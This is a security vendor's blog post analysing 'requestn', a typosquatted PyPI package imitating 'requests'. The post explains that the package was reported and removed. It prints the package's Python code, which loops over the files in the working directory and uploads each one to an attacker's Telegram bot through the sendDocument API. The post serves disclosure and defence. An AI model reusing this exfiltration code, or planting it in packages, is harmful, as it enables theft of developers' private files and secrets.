Python typosquatting attack targets popular open source PyPI library with 30M weekly downloads
An attacker published a Python package to the PyPI (Python Package Index) registry named "requestn," a name that's very similar to the very popular PyPI "requests" library. The malicious package was capable of exfiltrating a victim's files to a remote (and assumed to be Russian-controlled) Telegram server.
Trusty is a free-to-use software supply chain security monitoring platform that gives you insight into the safety of your open source dependencies. Trusty looks for certain patterns such as the proof of origin / source provenance mapping of a codebase to a package; the activity of the project and its authors; and the advanced textual / binary analysis of a package contents to discover malware, CVEs, and malicious code.
It came to our attention earlier today that a 3-day-old account, "Dmitry2001," published a Python package to the PyPI (Python Package Index) registry named requestn, a name that's very similar to the very popular PyPI requests library. The requests library has more than 30 million downloads a week. It is a hugely popular library in Python that simplifies making HTTP requests to interact with web services.
Trusty's threat analysis system, developed by Stacklok, was able to interpret the requestn package as suspicious, due to its close proximity to the popular requests library. You can see a UI expression of the check below:
On closer inspection of the library, it became clear that this was something particularly nasty. It uses a Python script to send files from the user's computer to a Telegram chat channel using the Telegram Bot API.
Let’s walk through the code to understand more about what is happening here.
First, some basic supporting packages (webbrowser, socket) are installed via PIP, a tool used to retrieve Python packages. This is just the setup of what is needed for the script to run.
The script then starts by iterating over all the files in the current directory using os.listdir().
For each file in the directory, the script checks if the file is a regular file (not a directory) using os.path.isfile(file). If the file is a regular file, it is appended to the file_ha list, and the filename is stored in the variable g.
The script then prints the name of the file to the console using print(file). This is useful for either logging or debugging purposes, or perhaps to taunt the victim.
Next, the script sets the variable massage to the string@is_brother. This appears to be a Telegram username or chat ID.
The script then sends a POST request to the Telegram API to send a message to the @is_brother username. The URL for the POST request is constructed using a string format method, with token2 being the bot token that we have detracted. This is likely to inform the attacker that a payload will be submitted to their private Telegram using the sendDocument feature, which allows users to remotely post files to Telegram.
Finally, the script sends another POST request to the Telegram API—this time to send every document found on the victim's current working folder to a channel ID set within the ID2 variable.
Python
for file in os.listdir():
if os.path.isfile(file):
file_ha.append(file)
g = file
print(file)
massage = '@is_brother'
start_msg = requests.post(f"https://api.telegram.org/bot{token2}/sendMessage?chat_id\n\n@t.me/is_brother")
requests.post(f'https://api.telegram.org/bot{token2}/sendDocument?chat_id={ID2}&caption={massage}', files={'document': open(g, 'rb')})
Last of all, it writes the string representation of the current file to a file named SIN.txt, followed by a newline character, \n. We expect this is again to taunt the victim with a list of files that have been compromised.
Overall the code is a little on the sloppy side, but it's enough to have caused significant problems. The likely attack vector here is that a user would type pip install requestn within a local development machine, which would have resulted in all of their local files being uploaded. This code may have been proprietary / private, or there could be some secrets or tokens present that would have been exfiltrated.
Stacklok has reported this package to the Python Security team, who has now removed it from the PyPI registry.
Trusty can help you prevent software supply chain attacks by providing analysis on the supply chain risk of your open source dependencies. Learn more and use Trusty for free at www.trustypkg.dev.
Luke Hinds is the CTO of Stacklok. He is the creator of the open source project sigstore, which makes it easier for developers to sign and verify software artifacts. Prior to Stacklok, Luke was a distinguished engineer at Red Hat.
